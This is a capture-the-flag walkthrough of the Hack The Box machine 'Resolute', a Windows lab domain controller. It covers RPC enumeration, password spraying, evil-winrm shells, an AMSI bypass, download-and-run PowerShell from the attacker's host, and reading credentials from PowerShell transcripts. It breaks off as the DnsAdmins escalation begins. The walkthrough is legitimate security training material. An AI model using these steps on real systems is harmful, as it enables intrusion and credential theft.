# Resolute - HTB

[[_TOC_]]

## Summary

<!-- markdownlint-disable MD033 -->
<div align="center"><img src="images/0.png"></div>

Resolute was a pleasant, medium-rated HTB Windows machine created by [egre55](https://app.hackthebox.com/users/1190)

Getting user involved enumerating RPC with null session.  
Privilege escalation involved using `DnsAdmins` group.

## Initial recon

```console
opcode@parrot$ nmap -v -p- --min-rate 2000 10.10.10.169
Nmap scan report for 10.10.10.169
Host is up (0.097s latency).
Not shown: 65511 closed tcp ports (reset)
PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws
47001/tcp open  winrm
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49667/tcp open  unknown
49671/tcp open  unknown
49678/tcp open  unknown
49679/tcp open  unknown
49684/tcp open  unknown
49916/tcp open  unknown
58273/tcp open  unknown
```

```console
opcode@parrot$ nmap -sC -sV -p 53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49664,49665,49666,49667,49671,49678,49679,49684,49916,58273 -oN resolute.nmap 10.10.10.169
Nmap scan report for 10.10.10.169
Host is up (0.093s latency).

PORT      STATE  SERVICE      VERSION
53/tcp    open   domain       Simple DNS Plus
88/tcp    open   kerberos-sec Microsoft Windows Kerberos (server time: 2023-11-12 20:01:24Z)
135/tcp   open   msrpc        Microsoft Windows RPC
139/tcp   open   netbios-ssn  Microsoft Windows netbios-ssn
389/tcp   open   ldap         Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
445/tcp   open   microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: MEGABANK)
464/tcp   open   kpasswd5?
593/tcp   open   ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp   open   tcpwrapped
3268/tcp  open   ldap         Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
3269/tcp  open   tcpwrapped
5985/tcp  open   http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open   mc-nmf       .NET Message Framing
49664/tcp open   msrpc        Microsoft Windows RPC
49665/tcp open   msrpc        Microsoft Windows RPC
49666/tcp open   msrpc        Microsoft Windows RPC
49667/tcp open   msrpc        Microsoft Windows RPC
49671/tcp open   msrpc        Microsoft Windows RPC
49678/tcp open   ncacn_http   Microsoft Windows RPC over HTTP 1.0
49679/tcp open   msrpc        Microsoft Windows RPC
49684/tcp open   msrpc        Microsoft Windows RPC
49916/tcp open   msrpc        Microsoft Windows RPC
58273/tcp closed unknown
Service Info: Host: RESOLUTE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2h47m01s, deviation: 4h37m09s, median: 7m00s
| smb2-time: 
|   date: 2023-11-12T20:02:15
|_  start_date: 2023-11-12T10:32:11
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: Resolute
|   NetBIOS computer name: RESOLUTE\x00
|   Domain name: megabank.local
|   Forest name: megabank.local
|   FQDN: Resolute.megabank.local
|_  System time: 2023-11-12T12:02:17-08:00
| smb2-security-mode: 
|   311: 
|_    Message signing enabled and required
```

Several ports are open, including DNS, Kerberos, SMB, RPC, LDAP, and WinRM. It's likely a DC.

We can start with LDAP enumeration:

```console
opcode@parrot$ ldapsearch -x -H ldap://10.10.10.169 -s base -b "" -LLL
dn:
currentTime: 20231112200226.0Z
subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=megabank,DC=local
dsServiceName: CN=NTDS Settings,CN=RESOLUTE,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=megabank,DC=local
namingContexts: DC=megabank,DC=local
namingContexts: CN=Configuration,DC=megabank,DC=local
namingContexts: CN=Schema,CN=Configuration,DC=megabank,DC=local
namingContexts: DC=DomainDnsZones,DC=megabank,DC=local
namingContexts: DC=ForestDnsZones,DC=megabank,DC=local
defaultNamingContext: DC=megabank,DC=local
schemaNamingContext: CN=Schema,CN=Configuration,DC=megabank,DC=local
configurationNamingContext: CN=Configuration,DC=megabank,DC=local
rootDomainNamingContext: DC=megabank,DC=local
[--SNIP--]
highestCommittedUSN: 155086
supportedSASLMechanisms: GSSAPI
supportedSASLMechanisms: GSS-SPNEGO
supportedSASLMechanisms: EXTERNAL
supportedSASLMechanisms: DIGEST-MD5
dnsHostName: Resolute.megabank.local
ldapServiceName: megabank.local:resolute$@MEGABANK.LOCAL
serverName: CN=RESOLUTE,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=megabank,DC=local
[--SNIP--]
```

We have the FQDN `Resolute.megabank.local` here; we can add it to `/etc/hosts`:

```text
10.10.10.169 Resolute.megabank.local megabank.local Resolute
```

## SMB enumeration

We can enumerate SMB shares. [NetExec](https://github.com/Pennyw0rth/NetExec) is my tool of choice these days:

```console
opcode@parrot$ docker run -it --entrypoint=/bin/bash --rm --name netexec nxc:latest
root@461787c441f8:~# echo '10.10.10.169 Resolute.megabank.local megabank.local Resolute' >> /etc/hosts
```

Testing for null session:

```console
root@461787c441f8:~# nxc smb 10.10.10.169 -d megabank.local -u '' -p '' --shares
SMB         10.10.10.169    445    RESOLUTE         [*] Windows Server 2016 Standard 14393 x64 (name:RESOLUTE) (domain:megabank.local) (signing:True) (SMBv1:True)
SMB         10.10.10.169    445    RESOLUTE         [+] megabank.local\: 
SMB         10.10.10.169    445    RESOLUTE         [-] Error enumerating shares: STATUS_ACCESS_DENIED
```

Null sessions are disabled.

Testing for guest session:

```console
root@461787c441f8:~# nxc smb 10.10.10.169 -d megabank.local -u 'opcode' -p '' --shares
SMB         10.10.10.169    445    RESOLUTE         [*] Windows Server 2016 Standard 14393 x64 (name:RESOLUTE) (domain:megabank.local) (signing:True) (SMBv1:True)
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\opcode: STATUS_LOGON_FAILURE 
```

Guest sessions are disabled as well.  
Note that `SMBv1` is enabled. I thought of [Eternalblue](https://github.com/worawit/MS17-010), but found it to be patched.

## RPC enumeration

I also ran [enum4linux-ng](https://github.com/cddmp/enum4linux-ng) for RPC enumeration and found users and groups.  
We could also have found them with null session in `rpcclient`:

```console
opcode@parrot$ rpcclient -U "%" -c "lsaquery" 10.10.10.169
Domain Name: MEGABANK
Domain Sid: S-1-5-21-1392959593-3013219662-3596683436
```

Users:

```console
opcode@parrot$ rpcclient -U "%" -c "enumdomusers" 10.10.10.169
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[ryan] rid:[0x451]
user:[marko] rid:[0x457]
user:[sunita] rid:[0x19c9]
user:[abigail] rid:[0x19ca]
user:[marcus] rid:[0x19cb]
user:[sally] rid:[0x19cc]
user:[fred] rid:[0x19cd]
user:[angela] rid:[0x19ce]
user:[felicia] rid:[0x19cf]
user:[gustavo] rid:[0x19d0]
user:[ulf] rid:[0x19d1]
user:[stevie] rid:[0x19d2]
user:[claire] rid:[0x19d3]
user:[paulo] rid:[0x19d4]
user:[steve] rid:[0x19d5]
user:[annette] rid:[0x19d6]
user:[annika] rid:[0x19d7]
user:[per] rid:[0x19d8]
user:[claude] rid:[0x19d9]
user:[melanie] rid:[0x2775]
user:[zach] rid:[0x2776]
user:[simon] rid:[0x2777]
user:[naoki] rid:[0x2778]
```

We can use `rpcclient` to generate a list of users:

```console
opcode@parrot$ rpcclient -U "%" -c "enumdomusers" 10.10.10.169 | awk -F'[][]' '{print $2}' > users.txt
```

Now we can try roasting AS-REPs:

```console
opcode@parrot$ GetNPUsers.py megabank.local/ -usersfile users.txt
Impacket v0.12.0.dev1+20231012.22017.2de29184 - Copyright 2023 Fortra

[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User ryan doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User marko doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User sunita doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User abigail doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User marcus doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User sally doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User fred doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User angela doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User felicia doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User gustavo doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User ulf doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User stevie doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User claire doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User paulo doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User steve doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User annette doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User annika doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User per doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User claude doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User melanie doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User zach doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User simon doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User naoki doesn't have UF_DONT_REQUIRE_PREAUTH set
```

Nothing here.  
[enum4linux-ng](https://github.com/cddmp/enum4linux-ng) had also found an interesting bit via `querydispinfo`:

```console
opcode@parrot$ rpcclient -U "%" -c "querydispinfo" 10.10.10.169
index: 0x10b0 RID: 0x19ca acb: 0x00000010 Account: abigail  Name: (null)    Desc: (null)
index: 0xfbc RID: 0x1f4 acb: 0x00000210 Account: Administrator  Name: (null)    Desc: Built-in account for administering the computer/domain
index: 0x10b4 RID: 0x19ce acb: 0x00000010 Account: angela   Name: (null)    Desc: (null)
index: 0x10bc RID: 0x19d6 acb: 0x00000010 Account: annette  Name: (null)    Desc: (null)
index: 0x10bd RID: 0x19d7 acb: 0x00000010 Account: annika   Name: (null)    Desc: (null)
index: 0x10b9 RID: 0x19d3 acb: 0x00000010 Account: claire   Name: (null)    Desc: (null)
index: 0x10bf RID: 0x19d9 acb: 0x00000010 Account: claude   Name: (null)    Desc: (null)
index: 0xfbe RID: 0x1f7 acb: 0x00000215 Account: DefaultAccount Name: (null)    Desc: A user account managed by the system.
index: 0x10b5 RID: 0x19cf acb: 0x00000010 Account: felicia  Name: (null)    Desc: (null)
index: 0x10b3 RID: 0x19cd acb: 0x00000010 Account: fred Name: (null)    Desc: (null)
index: 0xfbd RID: 0x1f5 acb: 0x00000215 Account: Guest  Name: (null)    Desc: Built-in account for guest access to the computer/domain
index: 0x10b6 RID: 0x19d0 acb: 0x00000010 Account: gustavo  Name: (null)    Desc: (null)
index: 0xff4 RID: 0x1f6 acb: 0x00000011 Account: krbtgt Name: (null)    Desc: Key Distribution Center Service Account
index: 0x10b1 RID: 0x19cb acb: 0x00000010 Account: marcus   Name: (null)    Desc: (null)
index: 0x10a9 RID: 0x457 acb: 0x00000210 Account: marko Name: Marko Novak   Desc: Account created. Password set to Welcome123!
index: 0x10c0 RID: 0x2775 acb: 0x00000010 Account: melanie  Name: (null)    Desc: (null)
index: 0x10c3 RID: 0x2778 acb: 0x00000010 Account: naoki    Name: (null)    Desc: (null)
index: 0x10ba RID: 0x19d4 acb: 0x00000010 Account: paulo    Name: (null)    Desc: (null)
index: 0x10be RID: 0x19d8 acb: 0x00000010 Account: per  Name: (null)    Desc: (null)
index: 0x10a3 RID: 0x451 acb: 0x00000210 Account: ryan  Name: Ryan Bertrand Desc: (null)
index: 0x10b2 RID: 0x19cc acb: 0x00000010 Account: sally    Name: (null)    Desc: (null)
index: 0x10c2 RID: 0x2777 acb: 0x00000010 Account: simon    Name: (null)    Desc: (null)
index: 0x10bb RID: 0x19d5 acb: 0x00000010 Account: steve    Name: (null)    Desc: (null)
index: 0x10b8 RID: 0x19d2 acb: 0x00000010 Account: stevie   Name: (null)    Desc: (null)
index: 0x10af RID: 0x19c9 acb: 0x00000010 Account: sunita   Name: (null)    Desc: (null)
index: 0x10b7 RID: 0x19d1 acb: 0x00000010 Account: ulf  Name: (null)    Desc: (null)
index: 0x10c1 RID: 0x2776 acb: 0x00000010 Account: zach Name: (null)    Desc: (null)
```

The password for user `marko` leaks in the description: `Welcome123!`  
It seems like the password set by helpdesk for new employees; I also sprayed it across other accounts:

```console
root@461787c441f8:~# nxc smb 10.10.10.169 -d megabank.local -u users.txt -p 'Welcome123!'
SMB         10.10.10.169    445    RESOLUTE         [*] Windows Server 2016 Standard 14393 x64 (name:RESOLUTE) (domain:megabank.local) (signing:True) (SMBv1:True)
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\Administrator:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\Guest:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\krbtgt:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\DefaultAccount:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\ryan:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\marko:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\sunita:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\abigail:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\marcus:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\sally:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\fred:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\angela:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\felicia:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\gustavo:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\ulf:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\stevie:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\claire:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\paulo:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\steve:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\annette:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\annika:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\per:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\claude:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [+] megabank.local\melanie:Welcome123! 
```

It seems that `marko` has already updated his password, but `melanie` has not.

## Post-credential enumeration

Now that we have a set of credentials, we can enumerate more.  
Starting with SMB shares:

```console
root@461787c441f8:~# nxc smb 10.10.10.169 -d megabank.local -u 'melanie' -p 'Welcome123!' --shares
SMB         10.10.10.169    445    RESOLUTE         [*] Windows Server 2016 Standard 14393 x64 (name:RESOLUTE) (domain:megabank.local) (signing:True) (SMBv1:True)
SMB         10.10.10.169    445    RESOLUTE         [+] megabank.local\melanie:Welcome123! 
SMB         10.10.10.169    445    RESOLUTE         [*] Enumerated shares
SMB         10.10.10.169    445    RESOLUTE         Share           Permissions     Remark
SMB         10.10.10.169    445    RESOLUTE         -----           -----------     ------
SMB         10.10.10.169    445    RESOLUTE         ADMIN$                          Remote Admin
SMB         10.10.10.169    445    RESOLUTE         C$                              Default share
SMB         10.10.10.169    445    RESOLUTE         IPC$                            Remote IPC
SMB         10.10.10.169    445    RESOLUTE         NETLOGON        READ            Logon server share 
SMB         10.10.10.169    445    RESOLUTE         SYSVOL          READ            Logon server share 
```

Nothing remarkable here; WinRM is next:

```console
root@461787c441f8:~# nxc winrm 10.10.10.169 -d megabank.local -u 'melanie' -p 'Welcome123!'
WINRM       10.10.10.169    5985   RESOLUTE         [*] Windows 10.0 Build 14393 (name:RESOLUTE) (domain:megabank.local)
WINRM       10.10.10.169    5985   RESOLUTE         [+] megabank.local\melanie:Welcome123! (Pwn3d!)
```

We can already get a shell via WinRM, but I like to check a few more things:

```console
root@461787c441f8:~# nxc ldap 10.10.10.169 -d megabank.local -u 'melanie' -p 'Welcome123!' -M adcs
SMB         10.10.10.169    445    RESOLUTE         [*] Windows Server 2016 Standard 14393 x64 (name:RESOLUTE) (domain:megabank.local) (signing:True) (SMBv1:True)
LDAP        10.10.10.169    389    RESOLUTE         [+] megabank.local\melanie:Welcome123! 
ADCS        10.10.10.169    389    RESOLUTE         [*] Starting LDAP search with search filter '(objectClass=pKIEnrollmentService)'

root@461787c441f8:~# nxc ldap 10.10.10.169 -d megabank.local -u 'melanie' -p 'Welcome123!' -M maq
SMB         10.10.10.169    445    RESOLUTE         [*] Windows Server 2016 Standard 14393 x64 (name:RESOLUTE) (domain:megabank.local) (signing:True) (SMBv1:True)
LDAP        10.10.10.169    389    RESOLUTE         [+] megabank.local\melanie:Welcome123! 
MAQ         10.10.10.169    389    RESOLUTE         [*] Getting the MachineAccountQuota
MAQ         10.10.10.169    389    RESOLUTE         MachineAccountQuota: 10

root@461787c441f8:~# nxc smb 10.10.10.169 -d megabank.local -u 'melanie' -p 'Welcome123!' -M enum_av
SMB         10.10.10.169    445    RESOLUTE         [*] Windows Server 2016 Standard 14393 x64 (name:RESOLUTE) (domain:megabank.local) (signing:True) (SMBv1:True)
SMB         10.10.10.169    445    RESOLUTE         [+] megabank.local\melanie:Welcome123! 
ENUM_AV     10.10.10.169    445    RESOLUTE         Found NOTHING!
```

And some groups:

```console
root@461787c441f8:~# nxc ldap 10.10.10.169 -d megabank.local -u 'melanie' -p 'Welcome123!' -M group-mem -o group='Remote Management Users'
SMB         10.10.10.169    445    RESOLUTE         [*] Windows Server 2016 Standard 14393 x64 (name:RESOLUTE) (domain:megabank.local) (signing:True) (SMBv1:True)
LDAP        10.10.10.169    389    RESOLUTE         [+] megabank.local\melanie:Welcome123! 
GROUP-ME... 10.10.10.169    389    RESOLUTE         [+] Found the following members of the Remote Management Users group:
GROUP-ME... 10.10.10.169    389    RESOLUTE         Contractors
GROUP-ME... 10.10.10.169    389    RESOLUTE         melanie

root@461787c441f8:~# nxc ldap 10.10.10.169 -d megabank.local -u 'melanie' -p 'Welcome123!' -M group-mem -o group='Contractors'
SMB         10.10.10.169    445    RESOLUTE         [*] Windows Server 2016 Standard 14393 x64 (name:RESOLUTE) (domain:megabank.local) (signing:True) (SMBv1:True)
LDAP        10.10.10.169    389    RESOLUTE         [+] megabank.local\melanie:Welcome123! 
GROUP-ME... 10.10.10.169    389    RESOLUTE         [+] Found the following members of the Contractors group:
GROUP-ME... 10.10.10.169    389    RESOLUTE         ryan

root@461787c441f8:~# nxc ldap 10.10.10.169 -d megabank.local -u 'melanie' -p 'Welcome123!' -M group-mem -o group='Domain Admins'
SMB         10.10.10.169    445    RESOLUTE         [*] Windows Server 2016 Standard 14393 x64 (name:RESOLUTE) (domain:megabank.local) (signing:True) (SMBv1:True)
LDAP        10.10.10.169    389    RESOLUTE         [+] megabank.local\melanie:Welcome123! 
GROUP-ME... 10.10.10.169    389    RESOLUTE         [+] Found the following members of the Domain Admins group:
GROUP-ME... 10.10.10.169    389    RESOLUTE         Administrator

root@461787c441f8:~# nxc ldap 10.10.10.169 -d megabank.local -u 'melanie' -p 'Welcome123!' -M group-mem -o group='Protected Users'
SMB         10.10.10.169    445    RESOLUTE         [*] Windows Server 2016 Standard 14393 x64 (name:RESOLUTE) (domain:megabank.local) (signing:True) (SMBv1:True)
LDAP        10.10.10.169    389    RESOLUTE         [+] megabank.local\melanie:Welcome123! 

root@461787c441f8:~# nxc ldap 10.10.10.169 -d megabank.local -u 'melanie' -p 'Welcome123!' -M group-mem -o group='Domain Computers'
SMB         10.10.10.169    445    RESOLUTE         [*] Windows Server 2016 Standard 14393 x64 (name:RESOLUTE) (domain:megabank.local) (signing:True) (SMBv1:True)
LDAP        10.10.10.169    389    RESOLUTE         [+] megabank.local\melanie:Welcome123! 
GROUP-ME... 10.10.10.169    389    RESOLUTE         [+] Found the following members of the Domain Computers group:
GROUP-ME... 10.10.10.169    389    RESOLUTE         MS02$
```

`melanie` and `ryan` can use WinRM, and we have a machine account `MS02$`

[ConPtyShell](https://github.com/antonioCoco/ConPtyShell) did not work on this box; I had to use [evil-winrm](https://github.com/Hackplayers/evil-winrm)

```console
opcode@parrot$ evil-winrm -i 10.10.10.169 -u melanie -p 'Welcome123!'
```

## Post-shell AD enumeration

```console
*Evil-WinRM* PS C:\> whoami /all

USER INFORMATION
----------------

User Name        SID
================ ===============================================
megabank\melanie S-1-5-21-1392959593-3013219662-3596683436-10101


GROUP INFORMATION
-----------------

Group Name                                 Type             SID          Attributes
========================================== ================ ============ ==================================================
Everyone                                   Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level     Label            S-1-16-8192


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.
```

Nothing useful here.

```console
*Evil-WinRM* PS C:\> netstat -ano -p TCP | findstr LISTENING
  TCP    0.0.0.0:88             0.0.0.0:0              LISTENING       580
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       808
  TCP    0.0.0.0:389            0.0.0.0:0              LISTENING       580
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:464            0.0.0.0:0              LISTENING       580
  TCP    0.0.0.0:593            0.0.0.0:0              LISTENING       808
  TCP    0.0.0.0:636            0.0.0.0:0              LISTENING       580
  TCP    0.0.0.0:3268           0.0.0.0:0              LISTENING       580
  TCP    0.0.0.0:3269           0.0.0.0:0              LISTENING       580
  TCP    0.0.0.0:5985           0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:9389           0.0.0.0:0              LISTENING       1960
  TCP    0.0.0.0:47001          0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:49664          0.0.0.0:0              LISTENING       448
  TCP    0.0.0.0:49665          0.0.0.0:0              LISTENING       920
  TCP    0.0.0.0:49666          0.0.0.0:0              LISTENING       964
  TCP    0.0.0.0:49667          0.0.0.0:0              LISTENING       580
  TCP    0.0.0.0:49671          0.0.0.0:0              LISTENING       1056
  TCP    0.0.0.0:49678          0.0.0.0:0              LISTENING       580
  TCP    0.0.0.0:49679          0.0.0.0:0              LISTENING       580
  TCP    0.0.0.0:49684          0.0.0.0:0              LISTENING       572
  TCP    0.0.0.0:49865          0.0.0.0:0              LISTENING       3208
  TCP    10.10.10.169:53        0.0.0.0:0              LISTENING       3208
  TCP    10.10.10.169:139       0.0.0.0:0              LISTENING       4
  TCP    127.0.0.1:53           0.0.0.0:0              LISTENING       3208
```

No new ports either.

We can try running [adPEAS](https://github.com/61106960/adPEAS):

```console
*Evil-WinRM* PS C:\windows\tasks> Bypass-4MSI
                                        
Info: Patching 4MSI, please be patient...
                                        
[+] Success!
*Evil-WinRM* PS C:\windows\tasks> IEX(IWR http://10.10.14.32:8000/adPEAS.ps1 -UseBasicParsing)
*Evil-WinRM* PS C:\windows\tasks> Invoke-adPEAS
```

Note that we need to patch AMSI first.

```text
[+] Found members in group 'MEGABANK\DnsAdmins':
GroupName:              Contractors
distinguishedName:          CN=Contractors,OU=Groups,DC=megabank,DC=local
objectSid:              S-1-5-21-1392959593-3013219662-3596683436-1103
[+] description:            Contractors 
 
sAMAccountName:             ryan
userPrincipalName:          ryan@megabank.local
distinguishedName:          CN=Ryan Bertrand,OU=Contractors,OU=MegaBank Users,DC=megabank,DC=local
objectSid:              S-1-5-21-1392959593-3013219662-3596683436-1105
memberOf:               CN=Contractors,OU=Groups,DC=megabank,DC=local
[*] accountexpires:         This identity has been expired since 12/31/1600 16:00:00
pwdLastSet:             11/13/2023 13:13:02
userAccountControl:         NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD
```

The user `ryan` is most likely our next target; it belongs to `Remote Management Users` as well as `DnsAdmins` group.

`adPEAS` also generated bloodhound files; we need to download them:

```console
*Evil-WinRM* PS C:\Windows\Tasks> download "C:/Windows/Tasks/megabank.local_20231113131422_BloodHound.zip"
                                        
Info: Downloading C:/Windows/Tasks/megabank.local_20231113131422_BloodHound.zip to megabank.local_20231113131422_BloodHound.zip
                                        
Info: Download successful!
```

I started `neo4j`:

```console
opcode@parrot$ sudo neo4j console
```

And `Bloodhound`:

```console
opcode@parrot$ ./BloodHound --in-process-gpu
```

Starting with `melanie`, I could not find any path to reach high-value targets.


Next, I tried [PrivescCheck](https://github.com/itm4n/PrivescCheck):

```console
PS C:\Windows\Tasks> IEX(IWR http://10.10.14.32:8000/PrivescCheck.ps1 -UseBasicParsing)
PS C:\Windows\Tasks> Invoke-PrivescCheck
```

Nothing remarkable was found.

## Credentials in hidden directory

With the usual options exahusted, I asked for a hint and was pointed towards hidden folders in `C:\`

```console
*Evil-WinRM* PS C:\> gci -force


    Directory: C:\


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d--hs-        12/3/2019   6:40 AM                $RECYCLE.BIN
d--hsl        9/25/2019  10:17 AM                Documents and Settings
d-----        9/25/2019   6:19 AM                PerfLogs
d-r---        9/25/2019  12:39 PM                Program Files
d-----       11/20/2016   6:36 PM                Program Files (x86)
d--h--        9/25/2019  10:48 AM                ProgramData
d--h--        12/3/2019   6:32 AM                PSTranscripts
d--hs-        9/25/2019  10:17 AM                Recovery
d--hs-        9/25/2019   6:25 AM                System Volume Information
d-r---        12/4/2019   2:46 AM                Users
d-----        12/4/2019   5:15 AM                Windows
-arhs-       11/20/2016   5:59 PM         389408 bootmgr
-a-hs-        7/16/2016   6:10 AM              1 BOOTNXT
-a-hs-       11/13/2023   1:02 PM      402653184 pagefile.sys
```

The `PSTranscripts` directory is not default.

```console
*Evil-WinRM* PS C:\PSTranscripts\20191203> gci -force


    Directory: C:\PSTranscripts\20191203


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-arh--        12/3/2019   6:45 AM           3732 PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt
```

In this file, one of the lines contains a `ryan`'s password:

```text
>> ParameterBinding(Invoke-Expression): name="Command"; value="cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
```

It works for `evil-winrm` as expected:

```console
opcode@parrot$ evil-winrm -i 10.10.10.169 -u ryan -p 'Serv3r4Admin4cc123!'
```

There is a note on the Desktop:

```console
*Evil-WinRM* PS C:\Users\ryan\Desktop> cat "C:/Users/ryan/Desktop/note.txt"
Email to team:

- due to change freeze, any system changes (apart from those to the administrator account) will be automatically reverted within 1 minute
```

## Privilege escalation using DnsAdmins group

```console
*Evil-WinRM* PS C:\Users\ryan\Desktop> whoami /all

USER INFORMATION
----------------

User Name     SID
============= ==============================================
megabank\ryan S-1-5-21-1392959593-3013219662-3596683436-1105


GROUP INFORMATION
-----------------

Group Name                                 Type             SID                                            Attributes
========================================== ================ ============================================== ===============================================================
Everyone                                   Well-known group S-1-1-0                                        Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545                                   Mandatory group, Enabled by default, Enabled group
